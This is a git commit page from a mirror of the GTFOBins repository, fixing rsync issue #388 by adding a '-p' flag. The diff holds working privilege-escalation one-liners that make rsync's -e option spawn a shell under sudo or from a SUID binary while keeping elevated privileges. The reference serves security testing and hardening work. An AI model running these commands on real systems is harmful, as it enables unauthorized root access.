mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Fix rsync issue #388 by adding missing -p flag
This commit is contained in:
parent
6696d463cd
commit
ac792081ea
@ -5,5 +5,5 @@ functions:
|
||||
sudo:
|
||||
- code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
||||
suid:
|
||||
- code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
||||
- code: ./rsync -e 'sh -p -c "sh -p 0<&2 1>&2"' 127.0.0.1:/dev/null
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user